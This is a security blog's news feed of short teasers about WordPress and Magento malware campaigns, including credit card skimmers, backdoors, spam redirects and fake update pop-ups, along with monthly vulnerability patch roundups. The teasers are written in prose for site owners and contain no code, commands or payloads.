Website Security News

Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners about potential threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. The vulnerabilities listed below are virtually patched by the Sucuri Firewall and existing clients are protected. Continue reading Vulnerability & Patch Roundup — November 2024 at Sucuri Blog.

Recently, our team discovered a JavaScript-based malware affecting WordPress sites, primarily targeting those using the Hello Elementor theme. This type of malware is commonly embedded within legitimate-looking website files to load scripts from an external source. The malware injects a malicious external script into the theme’s header.php file, leading to harmful consequences for site owners and visitors. Domains Involved: spadeanalytica[.]com uph-analytics[. Continue reading Malicious Script Injection on WordPress Sites at Sucuri Blog.

Magento websites are a frequent target for cybercriminals due to their widespread usage in eCommerce and the valuable customer data they handle. During a routine investigation, we discovered a malicious JavaScript injection targeting Magento websites. This malware dynamically creates a fake credit card form or extracts payment fields directly depending on the variant of the malware, activating only on checkout pages. The stolen data is then encrypted and exfiltrated to a remote server. Overview of the infection: Initially discovered by Weston Henry, a colleague on our team, the malware is designed to target Magento-powered eCommerce websites, specifically their checkout processes. Continue reading Credit Card Skimmer Malware Targeting Magento Checkout Pages at Sucuri Blog.

Just as there are countless types of websites on the internet, there are just as many attackers seeking to exploit them. These attackers develop malicious code that continuously evolves, constantly finding new ways to harm their next target. Sometimes, threat actors rely on heavy obfuscation to conceal their malicious code, while others use stealthier methods to disguise malware that is in plain sight. We recently stumbled upon a WordPress infection where the victim’s website was hosting a spam doorway that included casino and slot links based out of Indonesia. Continue reading Simple Include Statement Hides Casino Spam at Sucuri Blog.

We recently observed a surge in WordPress websites being infected by a sophisticated PHP reinfector and backdoor malware. While we initially believed that the infection was linked to the wpcode plugin, we found that several sites without this plugin were compromised as well. Upon deeper investigation, we discovered that this malware not only reinfects website files but also embeds malicious code into other plugins and database tables wp_posts and wp_options. One backdoor we uncovered revealed how attackers maintain unauthorized access to these sites, further spreading the infection. Continue reading PHP Reinfector and Backdoor Malware Target WordPress Sites at Sucuri Blog.

It’s common for malware to target e-commerce sites, and these attackers are usually seeking to steal credit card details. In most cases, they will insert scripts that extract data from the checkout forms to siphon fields like the cardholder name, card number and expiration date. Once they have that information, their job is done and they’ll use the data for other nefarious purposes (usually putting it up for sale on the black market). However, every now and then we encounter a case where in addition to that they are also looking to steal details for accounts that customers have created on these sites along with admin account credentials. Continue reading Malware Steals Account Credentials at Sucuri Blog.

The holiday shopping season is just around the corner, and it’s the time of year the eCommerce website owners need to be most on their guard. Credit card stealing malware, commonly referred to as “MageCart”, is most rampant during the holiday shopping season. Attackers are always aiming to maximize their profits. As such, they know that if they focus their time and efforts at the last quarter of the year they’ll have more stolen card details to sell on the dark web when the time comes to cash in on their ill-gotten gains. Continue reading 2024 Credit Card Theft Season Arrives at Sucuri Blog.

Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners about potential threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. The vulnerabilities listed below are virtually patched by the Sucuri Firewall and existing clients are protected. Continue reading WordPress Vulnerability & Patch Roundup October 2024 at Sucuri Blog.

Ads are everywhere. They generate revenue for site owners and can present related content to the website being visited. As detailed in previous articles, bad actors often take advantage of that functionality. Quite often rogue ad networks will be used to pull down malicious content, but recently we’ve seen a campaign where the threat actors are utilizing popular services like Github and Bitbucket to store their rogue ad sources. The injection WordPress and other CMS will often utilize plugins to insert header content directly from the admin panel, making it easy for developers and non-developers alike to add functionality to their sites. Continue reading Rogue Ads Redirect Visitors at Sucuri Blog.

Many pieces of malware found over the years have been complex and difficult to find. Attackers often obfuscate their code to make it harder to track. Some pieces of malware require extensive reviews to uncover. But in other instances, that is not always the case. Threat actors find new ways to inject malware to avoid detection, and in some situations, they hide their malicious code in plain sight. Recently, I discovered a cleverly disguised malicious redirect, where attackers leveraged a popular redirect plugin in a WordPress site. Continue reading Indonesian Gambling Redirect Hiding in Plain Sight at Sucuri Blog.

In our recent investigation, we discovered a new malware campaign targeting WordPress sites through a fake plugin, universal-popup-plugin-v133, which delivers deceptive browser fix pop-ups. This malware leverages social engineering tactics to deceive visitors into downloading malicious files, compromising their systems. Type of website impacted and the scope of infection We reported a similar fake browser update in a recent June article. The current version of this malware affects WordPress sites, and we saw a similar case in August, 2024 which is now detected by SiteCheck as malware.fake_update.7. Continue reading Fake “Fix It” Pop-Ups Target WordPress Sites via Malicious Plugin to Download Trojan at Sucuri Blog.